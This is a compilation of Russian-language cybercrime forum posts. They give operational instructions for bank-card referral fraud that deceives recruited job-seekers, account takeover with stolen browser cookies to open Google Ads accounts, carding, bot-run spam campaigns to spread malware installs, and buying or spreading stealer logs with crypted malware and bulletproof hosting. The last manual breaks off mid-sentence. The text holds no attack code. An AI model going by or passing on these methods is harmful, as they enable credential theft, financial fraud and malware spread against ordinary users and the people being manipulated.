Самая вкусная часть.
Создаем новый аккаунт в тг и делаем ему презентабельный вид подобный
этому:
Далее нам необходимо составить объявление, которое мы будем рекламировать. Тут
есть выбор тематики в которую вы будете заводить лидов, но остановлюсь я на
одной "Обнал БК и/или Казино". Но дополню эту тему другими, если будет
нужно.
**
Пример моего объявления:
Когда все эти составляющие готовы, переходим к генерации трафика, это можно делать с вложениями и без них, также разными способами.
Бесплатно
Ищем чаты и каналы на подобии: "Работа Москва", "Вакансии Москва", "Услуги
Москва", соответственно меняем город и ищем.
Так же подходят не привязанные к городу/региону чаты/каналы. В общем просто
поиск работы и фриланса.**
В чатах по такой тематике практически никогда не нет нормальной модерации и вы
можете засылать объявление хоть каждый час (используйте отложенные
сообщения в телеграме)
И будете получать своих лидов абсолютно бесплатно, поверьте идут и будут идти
пачками.
Платно
Ищем биржи рекламы в телеграмм каналах (там админы тг каналов выкладывают
объявления о продаже рекламы в своих каналах). Выбираем каналы, нам
подходят: Региональные (Подслушено Москва - например), Новостные, Бизнес,
Работа, Услуги, Фриланс биржи и т.п
Пишем менеджерам, узнаем цены на рекламу, составляем список и покупаем рекламу
в каналах с более менее нормальными охватами. Не берите крупные каналы, они
вам тупо не зачем.
Есть более простой но тоже платный метод, который я тоже проверил и он
понравился больше чем выше описанный. Покупка рассылки. Суть:
Обращайтесь к человеку который оказывает услуги рассылки объявлений по чатам -
кидаете ему объявление - выбираете тематику чатов (они уже есть у селлера как
правило) - платите и принимаете лидов.
Думаю откуда идет трафик вы поняли, а теперь покажу в чем ваша выгода:
Стоимость рассылки как правило +-30$/неделя, а лидов приходит 70-100 штук.
Личка у вас будет забита - это я обещаю.
**
3. Обработка лидов**
Ваша основная задача:
Рассказать лиду принцип работы - скинуть ссылки на оформление карт - после
оформления заставить "прогреть карты", т.е закинуть на каждую 500-1000 рублей
и потратить в магазине через POS (условие активации).
Примерный скрипт общения:
anonfiles.com
**Важно!**Не отвечайте лидам сразу, ответьте через 2-3 часа, чтобы показать вашу занятость.
Пару скринов переписок (залил файлом, чтобы не сорить в теме):
](https://anonfiles.com/zf5079I6yf/lid_screen_zip)
anonfiles.com
Примечание: Говорите, что работаете от 3ех карт минимум. После вопроса какие банки есть у лида, исключайте совпавшие с вашими из списка. При палеве партнерских ссылок, прикидывайтесь дурачком, мол понятия не имеете что это и ссылки дает руководство. Не работайте с дроповодами. ДОЖИМАЙТЕ активацию, не бросайте лидов, иначе все бессмысленно.
Статистика отказов: 3-4/10 соглашаются с условиями и вы получаете чистых
лидов.
Хорошая конверсия - 20-22%
**
4. Итог**
Благодаря дешевому трафику и достаточно хорошей выплате за лида вы получаете
иксы. Допустим:
Рассылка: 30$ (~ 1800 рублей)
Пришло лидов: 50
Оформило и активировало: 15
Средняя выплата по тарифу: 1500
**
15 * 1500 рублей = 22.500 рублей**
Думаю понятно откуда деньги
5. Нюансы
- Это долгие деньги (5 дней одобрение офферов, 14-30 дней проверка и выплата
денег)
- Ручная обработка лидов, занимает время 1-2 часа работы в день, но все же
время (саппорты в помощь)
- Легко масштабируется, модернизируется.
Несколько скринов из партнерки:
**
**
Теперь зная принцип фрода, вы можете брать аналогичные офферы, и фродить уже
их. Ищите связки, работайте и будет вам счастье.
Хотел бы поинтересоваться где можно брать трафик из-за бугра по 700-1000 установок в день, инсталлы не предлагайте
Приветствую, в последнее время стала интересовать работа с google ads, а конкретнее пролив на стиллер. Какие материалы можете посоветовать новичку?
В данной статье я хотел бы рассказать об одном из способов распространения
exe, а именно через ТикТок.
Обычно во всяких тимах с Бенами Стиллерами используют ютуб для проливов, но
это далеко не лучший способ распространения.
Давайте разберём воронку привлечения трафика на дейтинг, с органического трафика TikTok с прокладкой в виде телеграм-бота.
Для этого несложного дела нам понадобится:
Итак, мы готовы к запуску, все закуплено и подготовлено
Подготовка аккаунтов и прохождение модерации:
После приобретения аккаунтов, мы начинаем прогревать их. Заходим в 3 аккаунта с одного эмулятора (без прокси и впн) ставим аватар девушки, подбираем рандомный женский ник.
Далее публикуем одно видео с танцующей девушкой - максимально приближённое по контенту к нашим креативам. Первые видео на аккаунтах проходят модерацию ботом, чтобы отсеять спам контент и запрещенку.
Затем мы отсеиваем валид от невалид. Понять это достаточно просто - соотношение лайков к просмотрам должно быть больше 5%, при этом видео должно собрать от 500 просмотров и выше. В алгоритмах TikTok изначально заложено так, что все видео попадают в топ.
После того, как опубликовали все видео, даём отлежатся аккаунтам день (10-15 часов).
Дальше делаем полное оформление аккаунта, добавляем описание «знакомства для взрослых (ник бота)».
Аккаунты готовы, переходим к тг боту
Телеграм-бот достаточно простой в своей механике и реализации, он напоминает Badoo со скролами «нравится-не нравится» и ссылкой на «девушку». При нажатии «нравится» юзера перекидывает по нашему смартлинк; при нажатии «не нравится» ему выпадает следующая фотка, тем самым мы охватываем всех любителей.
Рекламные креативы достаточно просты, требуется лишь присутствие девушки с
сексуальным подтекстом (например: танец или занятие спортом).
Также, всегда нужно помнить, что тикток любит «тупых». Чем меньше вы
заморачиваетесь над контентом, чем нелепее все выглядит, тем
лучше
Подобные видео можно брать в Instagram, либо в аналоге тикток Like.
Публиковать видео нужно не больше чем 2 шт в час. Также каждое видео должно
быть уникальным, и не пересекаться на других наших аккаунтах.
Средний охват каждого видео на наших аккаунтах составил 10-50к просмотров.
За месяц слива мы привлекли 270 тысяч человек в телеграм-бота. И заработали
порядка 5 000$ на смартлинк по гео снг. При этом мы не делали push-рассылку на
участников бота.
Всех обнимаю и рекомендую присмотреться к данном источнику трафика.
Ваш
новокекич
Раньше работал без клоаки, сейчас появилась потребность в нём, аккаунт Keitaro уже есть, панель сделал, не могу разобраться как правильно его привязать. если правильно понял, то мне надо поднять домен и к нему же ставить клоаку, и оно будет пускать нужный траф, а не нужный будет уходить на другой сайт, поправьте если что не так понял, заранее спасибо
Всем привет, хочу рассказать о легких манипуляция благодаря которым вы сможете
заработать неплохие деньги.
Из-за этой темы в многих городах России были образованы офисы которые работали
с большими объемами и заработали
1. Что нам нужно
- Браузер по типу Мазилы
- Забугор Логи с валидными Куками
- ВПН под европу
- Любая карта с балансов 150р
Начнем:
2. Что мы делаем
- Покупаем логи забугор и распаковываем их на рабочий стол
Spoiler: (2)
- Включаем ВПН под купленный нам лог. Обязательно ставьте страну лога откуда он пришел
Spoiler
- Открываем браузер и добавляем расширение куки менеджер (ссылка)
Spoiler
- Далее куки одного из логов грузим в наш браузер и после ****аем сайт Google.com (советую грузить все куки по очереди)
Spoiler
- Видим что у нас стоит изображение на аватарке, значит мы вошли. Если нет, можно попробовать найти лог\пас в логах
Spoiler
- Открываем все сервисы и выбираем Google Adwords и нажимаем начать
Spoiler
Spoiler
- И так мы уже на пол пути! Открывается помощник по настройке и создании компании. Но мы выбираем Switch to Expert Mode
Spoiler
- Нас просят выбрать тип компании но мы выбираем Create an account without a campaign
Spoiler
- Здесь нам нужно настроить все под италию и выбрать валюту евро. Почему? - В 97% созданные аккаунты под Америку банятся сразу
Spoiler
- После выбора страны и валюты нажимаем Submit и EXPLORE YOUR ACCOUNT
Spoiler
- И так мы попадаем на главную страницу, сейчас нам надо привязать любую
карту на которой есть баланс, потому что гугл ее проверяет. Переходим в
BILLING и SUMMARY
Спойлер: скриншот
Spoiler
- Мы попадаем на страницу настройки биллинга, не пугайтесь, здесь нет ничего
сложно. Открываем гугл Карты и ищем Италию и город Рим
Спойлер: скриншот
Spoiler
- Выбираем любой магазин или предприятие и переходим на страницу биллинга и открываем name and address
Spoiler
Заполняем все поля как на скриншоте
- И наконец привязываем карту и нажимаем Submit. Если вылезла ошибка где
номер карты, значит на карте нет денег или она указана не правильно.
Spoiler
- Если у вас вылезло вот такое окно, то просто обновляем страницу
- И что мы видим ОМГ нам дали 300 евро которые мы можем потратить на рекламу!
Spoiler
Статья написана не мной, была взята со соседнего форума. Источника нет, но
есть тг автора(персонажа который слил данный материал), он сам любезно оставил
его под статьей - @WALGED
Цель: показать/оповестить "местных", "молодых" ребят(каковым и я являюсь), по
моему мнению мнению, материал не последний по важности...
Доброго времени суток, подкиньте люди добрые инфы по дорвеям, где можно почитать что это такое и с чем его едят. Есть лом где можно повесить, руки прямые в наличии, не хватает только источника знаний. Всем заранее спасибо за инфу/советы.
Всем привет, парни, столкнулся с такой проблемой, что каждый мой акк летит в
саспенд, после линковки сс.
Проблема появилась с недельку может назад, пробую такую схему:
беру usa google log, смотрю айпишник/зип, покупаю проксю на 911 под эти
данные.
Прохожу регистрацию без/с созданием рк
Затем беру сс под зип, линкую ее и ловлю саспенд на акк.
Пробовал так же, с чистой виртуалки и туннелями с гетссш, настраивал ось под
инфу с лога через сстулс, проблема идентичная.
Антики/портейбл/обычные браузеры не спасают, все так же после линковки сс
ловлю саспенд.
У кого-нибудь есть похожая проблема? Неделю+ назад, залетало на ура, залетало нонстопом, даже без ебки какой-либо, с любых абсолютно параметров, с любыми проксями, влетали даже сс других стран в юса лог, не было проблем абсолютно.
Сейчас как по щелчку меня начало фродить и хочеться понять, фродит именно меня или в целом был какой-то апдейт?
Доброго времени суток, пользователям XSS a.k.a DamageLab!
Сегодня хотелось бы поговорить о трафике, методах его добычи, способах конвертации трафика в целевое действие (будь то скачивание и установка софта со зверьком, то бишь инсталл, или же ввод платежных/других авторизационных данных при рыбалке, или же оплату за ~~говно~~ воздух, то бишь скам и прочее) и поделиться одним кейсом.
Небольшое отступление
Spoiler
Изначально идея была в том, чтобы поделиться с юзерами свежим, только что
отработанным кейсом (или кейсом, который работает прямо сейчас) по получению
инсталлов, но т.к. продления конкурса не будет, я решил выложить статью в том
виде, в котором могу написать ее здесь и сейчас с целью дополнить (если будет
такая возможность) первый пост результатами и более подробным описанием
процесса, или же дописать инфу в виде отчета, статистики и описания подводных
камней и путей их решения (если возможности дополнить первый пост не будет),
после того, как закончу работу с данным кейсом.
Статья, скорее всего, получится больше теоретической, чем практической, из-за
того, что практику я тупо не успеваю закончить до конца конкурса, хотя тянул
до последнего момента, в надежде успеть, но тем не менее – мне интересно
поучаствовать в конкурсе, а также имею надежду найти единомышленников, с кем
можно будет пообщаться с целью совершенствования метода, или подискутировать в
целом на тему манипуляций с трафом.
Цель статьи – рассказать о том, что может быть применено в 9/10 проектах (будь то добыча инсталлов, создание хайпа/млм, рыбалка, или же слив трафа на партнерку). Надеюсь, что инфа будет полезна и люди смогут воспользоваться ею, доработав для себя и своего проекта.
Приятного чтения и благодарю за потраченное время)
Методы добычи.
Методы добычи трафика включают в себя как платные , так и условно- бесплатные методы (бесплатные методы тоже есть, но соотношение затраченного времени к полученному результату вас, мягко говоря, не устроит, поэтому о них не упоминаем).
Из платных способов стоит выделить – таргетированная, тизерная и баннерная реклама (подробно о каждом указанном и не указанном здесь методе прочитать можно на любом ресурсе, связанным с арбитражем трафика – копипастить сюда определения смысла не вижу).
Из условно-бесплатных стоит отметить – дорвеи, спам и продвинутый спам, под названием «сарафанное радио» (на этом методе будет дан мой старый кейс, который я использовал n-ое время назад, а также буду использовать в ближайшее время для решения моей текущей задачи и как раз решение этой задачи, изначально, и планировалось осветить в данной статье).
**Чуть подробнее об условно-бесплатных методах и их сути:
Спам** – всё довольно просто и в то же время сложно, т.к. его Величество Люцифер кроется в деталях (таких как – способы рассылки, базы, низкая конверсия в случае, если предложение составлено не достаточно привлекательно, или же слишком большое – т.е. есть серьезная необходимость найти «золотую середину»). Суть метода сводится к рассылке по заранее подготовленной базе получателей того, или иного предложения. Подходит, по сути, под любой метод монетизации – добыча инсталлов, реклама товара/сервиса и фишинг ;
Дорвеи – тут уже посложнее работа, особенно после ввода гуглом алгоритма берта, что привело, по разным данным, к потерям в дорвейном трафике от 10-12 до 80 процентов (тут стоит оговориться, что это – потери каждого конкретного дорвейщика, а не всеобщая статистика и они получились разными, кто-то потерял почти всё, кто-то незначительную часть, а кто-то и совсем не почувствовал разницы). Сейчас большая часть дорвеев становится всё больше и больше похожа на СДЛ (Сайты Для Людей), что с одной стороны – хорошо, т.к. это позволяет сетке прожить дольше, а с другой стороны – усложняет создание сети дорвеев, что, в свою очередь, замедляет параллельное создание нескольких сеток (а именно так, как правило, и работают – создается несколько сеток с некоторыми концептуальными отличиями друг от друга для каждой конкретной темы, это делается с целью сбора статистики и увеличения шансов на «быстрый выстрел») и, тем самым, увеличивает время для выхода на доход. Суть метода сводится к созданию огромного количества страниц и сайтов, наполненных поисковыми ключами (как правило – низко- и среднечастотные ключи),которые занимают хорошие позиции в поисковой выдаче и приносят трафик, который либо просто редиректит (плохой вариант, ПС негативно относятся к этому, а также теряется еще не полученное доверие пользователя) юзера на целевой сайт, или же предлагает перейти на целевой сайт (хороший вариант, т.к. юзер видит ту инфу, что искал и, при грамотном предложении перейти на целевой сайт, количество переходов может достигать 80-90%), который и приносит нам целевое действие (продажа/ввод данных/инсталл).
«Сарафанное радио» - комплексный подход к продвижению чего-либо, являющийся в реализации, наверное, самым сложным методом из описанных, т.к. является более продвинутой версией спама. Лучше всего подходит для продвижения белых и серых проектов, скама и фишинга, хотя при должной доработке – может быть легко адаптирован и под получение инсталлов. Суть метода сводится к тому, чтобы создать максимально правдоподобную видимость «движухи» и продемонстрировать её тем, кто «за бортом» с целью привлечь их к участию. Наверняка многие из вас видели в тех, или иных соцсетях комментарии на постах от фейков, которые продвигают различные гемблинг (казино, ставки и т.п.) офферы, или же микрозаймы, или что-то подобное. Как правило сценарий у них плюс-минус похожий и сводится к чему-то вроде – «всем привет, я нашел/нашла легкий способ офигенно поднять денег из воздуха, если тебя заинтересовало – переходи по ссылке/пиши в личку и узнай подробности». Как бы убого это не звучало, как бы убого и неправдоподобно эти фейки не выглядели, но это, черт подери, до сих пор работает (впервые этот метод я начал замечать еще в 2011, а мб и раньше, году) и конвертит людей, принося бабки арбитражникам. Но, по своей сути, то, что они используют – это лютый примитив и, по факту, они теряют около 50-60% лидов, как раз из-за того, как убого созданы их фейки и того, что текст составлен на отъебись (пардоньте мой французский).
Кейс, предисловие
Spoiler
Небольшая ремарка №1 – кейс основывается на личном опыте использования
«сарафанного радио» с целью получить инсталлы на своего зверька.
Небольшая ремарка №2 – как я уже говорил ранее – мне бы хотелось показать этот
кейс на свежачке (над которым работаю в данное время, т.к. понадобилось
наладить добычу логов по одному запросу) с уточнениями по автоматизации и
масштабированию, но совсем не успеваю с реализацией по временным рамкам,
поэтому статья получается больше теоретической, но с использованием данных из
предыдущего применения.
Как уже говорилось выше – суть метода заключается в том, чтобы создавать у людей ощущение, что вокруг происходит некая «движуха», в которой участвуют буквально все, но только не ты. А это, как правило, вызывает у человека интерес (обычно что-то вроде – «что это за ProjectName, о котором я уже не первый раз слышу») и сподвигает погуглить более подробную инфу о ProjectName, а после и самому «влиться», если подготовлен качественный бэкграунд для этого самого ProjectName и соблюдено условие знания целевой аудитории, в противном случае – вы будете иметь кучу трафика, но конверсия будет, откровенно говоря, хреновой.
Для работы по этому методу необходимо:
**Пойдем по-порядку:
Понимание целевой аудитории** – это самое первое, что нужно сделать, ибо если вы будете втюхивать спиннеры не 7-17 летним детям, а пенсионерам в возрасте 60+, то какой вас ждет результат? Правильно – хреновый, т.к. данная хрень (спиннеры) обрела свою популярность как раз у детей, а не у пенсионеров.
В нынешнем случае, моя целевая аудитория – это игроки MMORPG в возрастном диапазоне от 20 до 40 лет (основной костяк игроков принадлежит к этому диапазону, разумеется, что в эту игру играют как совсем школьники, так и люди более старшего возраста, однако основной диапазон взят как раз после изучения кучи различных форумов и пабликов, посвященных этой игре). Это значит, что стандартные читы тут не особо зайдут. Однако зайдут программы, позволяющие упростить некоторые моменты (будь то прокачка, или же подбор навыков и прочее).
И тут есть 2 варианта:
Spoiler
Я буду использовать второй вариант на старте, возможно, после некоторого сбора статистики перейду на первый вариант, или буду их миксовать.
С ЦА разобрались, идем далее, качественный бэкграунд :
В разрабатываемом сейчас кейсе он не требуется, т.к. любые читы/скрипты/боты для игр разрабатываются и продвигаются в 99% случаях без каких-либо сайтов и прочего (исключение – «приватные» решения, которые зачастую оказываются обычным скамом), да еще и бесплатно.
Однако пояснить, что такое этот «качественный бэкграунд» я обязан, так вот, поясняю:
Качественный бэкграунд представляет собой максимально полную легенду не только для ProjectName, но также проработку легенды, откуда этот проект появился, кому принадлежит, кто им пользуется и т.п.
Предыдущий проект, где я использовал «сарафан», включал в себя следующее:
Для чего это было сделано? Для того, чтобы человек, который узнал (здесь, по большей части, не так важно, первый, или же 10й раз человек видит эту информацию) о ProjectName и пошел гуглить, нашел то, что мы для него подготовили, а именно – различные форумы и блоги, а также аккаунты в соцсетях, где говорится о проекте во всех аспектах, как положительно, так и нейтрально- настороженно, так и негативно. Это придает «живости» любому проекту и, как правило, положительно сказывается на конверсии.
Далее – инструменты автоматизации :
По сути все эти функции вместе будут являться, грубо говоря, одним «ботом» (не совсем то название, но оно ближе всего отображает суть), на основе MEMU и использовании мобильных приложений, который, в зависимости от инструмента, будет выполнять ту, или иную функцию. Такой подход, как показывает практика, позволяет «ботам» жить дольше, нежели при использовании десктопных браузеров.
ВАЖНО! Для начала необходимо определить, где находится ваша ЦА, выбрать подходящие соцсети, форумы и мессенджеры, а уже после переходить к применению инструментария, однако набор почти всегда будет состоять из упомянутых выше решений.
Click to expand...
Реализация каждого перечисленного инструмента - целиком и полностью на ваше усмотрение, кому что ближе, удобнее и по карману, если речь о покупке на заказ у кого-либо)
ВАЖНО! Без качественного бэкграунда вы будете неэффективно тратить время и бюджет, имея посредственную конверсию, т.е. по сути вы будете юзать обычный спам, но вот затраты на него получатся не в пример выше, нежели бы вы изначально решили двигаться в направлении стандартного спама.
Click to expand...
Общая, максимально упрощенная, схема процесса вовлечения (количество и цель
каждого пункта будет, чаще всего, изменяться в том, или ином случае):
«Долго запрягает, но быстро едет»
Стоит уточнить, что «долго запрягает» тут относится к тому, что качественная подготовка может занять от недели и до нескольких месяцев, в зависимости от проекта и целей. «Быстро едет» же тут относится к тому, что при хорошей проработке бэкграунда, а также правильного соотношения ЦА и вашего предложения, вы начнете получать трафик, количество которого будет с каждым днем увеличиваться (длительность этого роста зависит целиком и полностью от целей проекта, мощности вашего железа, а также бюджета, выделенного для подготовки (потому что так, или иначе – аккаунты требуют затрат, будь то активации, или же использование прокси и т.п.), ибо чем больше вы подготовите аккаунтов, тем будет больше охват аудитории - соответственно и вовлечения людей в активное обсуждение вашего предложения, что влечет за собой получение трафика), уже через несколько часов после старта «сарафана».
Предыдущий отработанный кейс
Действия, которые я предпринимал в прошлый раз, когда применял данный подход для получения инсталлов:
Действия, которые я предпринимаю в этот раз, по сути, не отличаются от предыдущего, за исключением того, что здесь мне не нужен 2й, 3й и 4й пункты, т.к. продуктом будут являться инструменты для упрощения процесса прокачки в игре, что изначально подразумевает более высокую мотивацию скачать и запустить предлагаемый софт. Инфоповоды же будут создаваться на тематических форумах, ютуб каналах и пабликах, где обитает нужная мне ЦА.
Однако есть то, что я продумал, пока был не у дел. А именно:
Необходимо доработать спамер, внеся туда возможность "осмысленного" диалога с пользователями, которые будут обращаться к моим ботам (на данный момент – ведутся тесты этого решения под фб, собственно почему и не успеваю по срокам до окончания конкурса) в личку (раньше ботами личка игнорировалась и потому было затруднительно масштабироваться).
Click to expand...
Данная функция позволит увеличить конверсию в несколько раз (беглые тесты показали потенциал у этой доработки в плане конверсии). Конечно, – точными эти тесты считать нельзя ни в коем случае (т.к. не было четких ограничений и прочей серьезной работы, были сделаны тесты из разряда "А вдруг это прокатит"), как и нельзя 100%-но гарантировать огромный рост количества лидов для любого проекта при применении этой разновидности спама, однако потенциал определенно есть и он заставил задуматься о реализации максимально универсальной схемы «обратной связи», назовем этот функционал так.
Послесловие
Ориентировочные сроки окончания работ над подготовкой и отработкой того кейса, который я планировал слить сюда, – начало-середина декабря.
Также – если статья не подходит на роль конкурсной, то просьба перенести её в другой раздел и скрыть на время, пока я не закончу с кейсом, чтобы после опубликовать её в том виде, в котором изначально планировал.
После того, как я понял, что не успеваю закончить работу над фб, было принято решение продемонстрировать часть функционала (регистрация, заполнение аккаунтов и подписка в группы с лайками постов, с последующей "консервацией" бота на n-ое время, т.н. "отлега") на основе «одноклассников», чтобы обеспечить более полное понимание того, о чем велась речь.
После того, как будет закончена работа над решением под фб (она ведется с начала августа и только-только дошла до стадии полноценных тестов) – добавлю сюда видео демонстрации полного цикла работы с фб, убрав видео по одноклассникам, дабы никого не провоцировать и не смущать.
ВАЖНО! «одноклассники» выбраны были только потому, что имеют копеечную себестоимость создания (как приема смс для активации, так и менее требовательны к прокси) и более плохую антифрод систему, в отличии от фб. Также демонстрируется вполне легальный функционал, не нарушающий ничего, кроме правила о том, что один человек должен иметь один личный аккаунт (если таковое там есть) в соцсети.
Click to expand...
Spoiler
Описание по шагам:
Да, к слову, чуть не забыл - для использования всего этого дела понадобится хорошее железо/мощные дедики, иначе смысла в применении этого метода - не будет. Сам метод, по сути, завязан на масштабировании (имея на борту CPU в 6 ядер и 12 потоков с 32гб RAM - можно обеспечивать охват аудитории от 10к до 300к ЦА в сутки, используя 2-3 соцсети по 300-700 ботов в каждой (тесты проводились в 5 потоков, т.е. единовременно работало 5 ботов), большее количество - теоретически возможно, но на практике - железо будет скрипеть (заострю внимание еще раз - это именно ЦА, а не просто трафик, соответственно
Spoiler
Также на видео ниже покажу самую первую версию этого концепта, которая применяется практически в первозданном своем виде (за исключением того, что пару раз изменялись почтовые сервисы и под каждый писалось свое решение по массовой регистрации аккаунтов) уже на протяжении 2+ лет для раскачки аккаунтов продавцов на ебэй отзывами и покупками, для работы по дропшиппинг системе (здесь выражаю благодарность своему партнеру, которая активно занимается этой темой, за предоставление доступа к её ПК, чтобы записать видео процесса покупки и оставления отзывов) из Китая в ЕУ.
https://www.ebay.de/usr/werrem_78 - ссылка на один из таких аккаунтов продавцов, по вашему желанию можем добавить туда любую фразу из этого топика, дабы пруфануть, что это демонстрация нашего решения, а не рандомное видео с инета)
Описание по шагам:
Еще раз – в виду того, что я не успеваю до конца конкурса с полной реализацией и отработкой свежего кейса, я бы хотел попросить администрацию в последствии помочь мне с редакцией этого поста, дабы добавить сюда более актуальную информацию по применению «сарафана», статистику и подводные камни, а также методы их решения, чтобы вся необходимая инфа находилась в одном посте.
Всем спасибо за внимание, если есть какие-либо вопросы, то задавайте, отвечу)
Подскажите регистратора доменов который по максимуму игнорирует абузы на спам?
Все, нашел
Вечер в хату,мемберы!
Сегодня мы преступим к разбору достаточно молодой и трендовой темы - Логи.
( Статья написана исключительно в информационных целях,для порядочных и законопослушных граждан,не желающих оказаться жертвой гнусного мошенничества. Сами мы таким не занимаемся,нить )))
Собственно, мануал вряд ли станет актуальным для уже опытных кардеров,внимательно следящих за трендами привата, но новорегам и любителям, не сумевшим выбрать свою нишу и источник стабильного заработка - пойдет
В общем,мануал для самых самых маленьких )
Вы наверняка заметили,что последний год,особенно последние несколько месяцев, в связи с усложнением ситуации по добычи валидного картона,сдохшему еу ебею,закрытию хтала и прочим закрутам гаек,стали очень популярны логи.Все больше и больше появляется тем с продажей логов, а карманы некоторых скупов стали пополняться обилием нового валидного товара?В какой-то степени господа,сейчас карж получил глоток чистого,свежего воздуха. Набирает обороты с новыми силами. Вангую, мы с вами будем свидетелями нового и долгосрочного тренда,а возможно и...
хотя не, карж мертв.
Приступим.
В данном мануале я постараюсь объяснить..
1. Что такое - эти ваши Логи.
2. Где их фармить
3. Как купить качественный мат, чтоб вас не ~~наебали~~ провели.
4.Как настроить систему
5. Дам некоторые советы по вбиву
1. Логи
Представьте - вот ваш пк. Он сейчас прямо перед вами ) . Вы несколько месяцев
к ряду,серфили в мировой паутине.Делали различные покупки в шопах.
Регистрировали аккаунты на различных платформах.Возможно, отправляли данные
своих документов кому-нибудь,скажем,для приема на работу или оформления гос.
услуг. Или оплачивали коммуналку. Переписывались с телочкой,которая вас
френдзонит, в фейсбуке. Смотрели порево или гоняли ужа на мамку школьного
друга...
View attachment 11394
.... А может быть даже занимались реальными делами - например майнили и поднимали бабки на крипте. И вдобавок ко всему этому - вы вполне обеспеченный,среднестатистический американец. А не пиздитесь с голубями, за буханку хлеба,проживая в глубинках России. И в качестве бонуса - вы еще и не чистите регулярно куки и историю своего браузера. В общем поняли,к чему я клоню ) Все это станет доступным для нашего стиллера.
В одном логе может хранится множество данных. Данные логина и пароля от
сайтов,мыла и шопов. Аккаунтов пейпал, зелле. Банковские счета (Чейз,Фарго,Боф
и др).Соц. сети и инстаграмм. Steam и различные игрушки. Букинг. Крипто
кошельки. Айпи адрес юзера,по которому вы можем выяснить место его проживания
на 2ip. Информацию о железе юзера,с наименованием деталей и серийниками.
Проц,видяха,платы,акустика,разрешение монитора и т.д. Так же,благодаря
включенному в функционал некоторых стиллеров, Кейлогеру (захват клавиатуры) мы
увидим все комбинации нажатий юзера в отдельном файле. А нажатия чаще всего -
это данные кредитных карт,SSN и DOB,биллинг и шиппинг адреса,номера телефонов
и зип код,вод.удостоверения и различные документы, и вообще все,что мог
вводить юзер при покупках,регистрациях и т.д. Все это наш умный стиллер сможет
отфильтровать и сделает доступным для вашего понимания. Ну а самым сладким
бонусом будет наличие Cookies,к вышеперечисленному.
Что дает нам куки? Многие из вас наверное знают. Благодаря кукисам,
большинство сайтов воспринимает нас за реального хозяина аккаунта, зачастую
даже игнорируя форму ввода логина-пароля ( Если сессия не была разорвана) и не
накидывает нам очков фрода,за коннект с нового айпи адреса.Все это сильно
упрощает процесс вбива. **Есть куки - вы Кх.
Зачастую, опытные карж акулы,вкусив однажды вбивы под печеньками, больше никогда не возвращаются к работе с примитивными акками,добытыми с помощью брутта) Небо и земля. Как левая рука и правая Ну вы поняли.
Собственно, единого механизма работы с логами вероятно не существует,т.к лог предоставляет довольно обширный вариант действий и каждый может выбрать то,что ему по душе. Можно бить стаф,можно заниматься банками или заливами,скамом или шантажом, отжиманием аккаунтов, с последующей продажей,можно крафтить мат и т.д. Полная свобода творчества(Хотя я все же склоняюсь к первым двум вариантам). Но стоит помнить одно золотое правило - Почти с каждого валидного лога,можно что-то вытащить.
2. Как добыть Логи.
Вариантов добычи логов существует всего два. Либо купить, либо пролить)
Естественно,я настоятельно рекомендую покупать логи самостоятельно у селлеров,т.к процесс залива через стиллер/ботнет, довольно тяжелая,кропотливая и расходная операция. Но на всякий случай,рассмотрим кратко оба варианта.
И начну пожалуй со второго.
Изначально,существуют люди (в народе кличут их траферами), распространяющие установки всевозможного софта,среди обычных пользователей. Проще говоря - инсталлы. Чем они хороши? Например тем,что часто программы,в которых будет спрятан наш вирус (стиллер), скачиваются пользователем с официальных маркетов
Собственно,цены на инсталлеры варьируются,в зависимости от качества и
источника инсталлов,а так же страны.Более лучшим вариантом считается USA
инсталы. Цены их от 500 до 800 баксов за 1000 инсталлов. ДА-ДА,ребята, уже на
этом этапе будьте готовы к большим вложениям ,ибо 1000 инстталов чаще
всего это минимально возможное количество к покупке у трафера)
Так же, для обхода работы антивирусов юзера,перед процессом пролива происходит
криптовка (игра в прятки для нашего подрастающего стилочка ))). Далее - выбор
самого стиллера,которым вы будете проливать купленное вами добро. Наиболее
популярны сейчас Азор и Аркей. Так же,при покупке стиллера,нужно решить вопрос
с абузоустойчивым хостингом, дабы не просрать все вложенные деньги запоротой
панелькой. Либо рисковать,юзая бесплатный хост - но в таком случае вы рискуете
потерять все))) Ну а дальше,происходит процесс залива. В конечном счете из
N-го кол-ва инсталлов мы получаем N-ое количество логов. Хорошим отстуком
считается 70-80%. Отстук может зависеть от качества
инсталов,криптовки,хостинга и т.д. Но если соблюсти все меры осторожности и не
жалеть бабок,с 1000 инсталлов проливщик сможет добыть порядка 700-800 логов,из
которых примерно треть,после отсева,будет пригодна к продаже и обработке.
Хотя,как вы понимаете,цифры тут у всех разные. Кто-то и в ноль умудряется
ливать).
И не забывайте. Трафер - может оказаться скамом и пихнуть вам шлак или дабл. Ищите проверенных людей.
3. Шопимся диффчата
Собственно,учить покупать мат в даркнетах вас не буду. Думаю,сами сможете найти селлеров на различных бордах. Ну или можно спросить у меня,я кого-нибудь порекомендую) Контакты оставлю ниже.
Лучше расскажу,на что стоит обращать внимание и как не попасться на говноселлера,толкающего шлак и отработку.
Цены на логи сильно разнятся. Какие-то логи могут стоить от 10 до 40 рублей,какие-то доходят до 20$ за штуку. На цену,в первую очередь, играет вид стиллера,используемого при заливе. Хорошими - считаются стиллеры с широким функционалом. Они имеют кейлогер (функция захвата клавиатуры), благодаря которым вы видите набранные юзером комбинации клавиш, они способны обработать форму логин паролей всех основных браузеров ( Хром,Мазила,Опера и т.д.) , включают в себя настройки форм-граббера для передачи файлов с пк юзера и утилиты для определения железа.В логе такого стиллера будут акки шопов,кошельки,банки,палка,крипта,сс и т.д. В плохом стиллере - соответственно,будет только примитивный набор логин пароль, а сам лог будет состоять из нескольких аккаунтов к игрулькам,соц.сети,мылу,возможно стиму. Ну и всякий шлак. Наиболее топовым стиллером сейчас считается Азор и чуть менее, Аркей.
_После покукпи,первым делом, смотрим на дату добавления в админ панель. Приемлемым,считается лог не старше 2-3 недель. В идеале,1-3 дня после залива. Обычно,дата будет отображена в названии самого архивного файла,что пришлет вам селлер.
Обратите внимание,иногда хитрожопые продавцы отработки, переименовывают исходный архив (например так)
Зачем? Чтобы скрыть от вас возраст лога. Но это не беда - можно посмотреть тут.
Настоятельно советую,перед покупкой лога,просить у селлера что-нибудь из отработки или невалида с последнего сделанного залива. Для нормального селлера,у которого в наличии порядка 300-500 логов к продаже, это не вызовет затруднений. Зато у скама, отработавшего лог несколько месяцев назад и желающего втюхать свою жалкую десятку логов с отработки - это вероятно вызовет горение серных слоев атмосферы.
Почему важен возраст лога? Все просто. Куки помогают нам в том случае,если они
свежие. Вы же понимаете, что юзер, чьи данные мы используем - как бы не ждет
порядочно,пока мы высосем из его кридиток бабки. Конечно нет. О процессе он
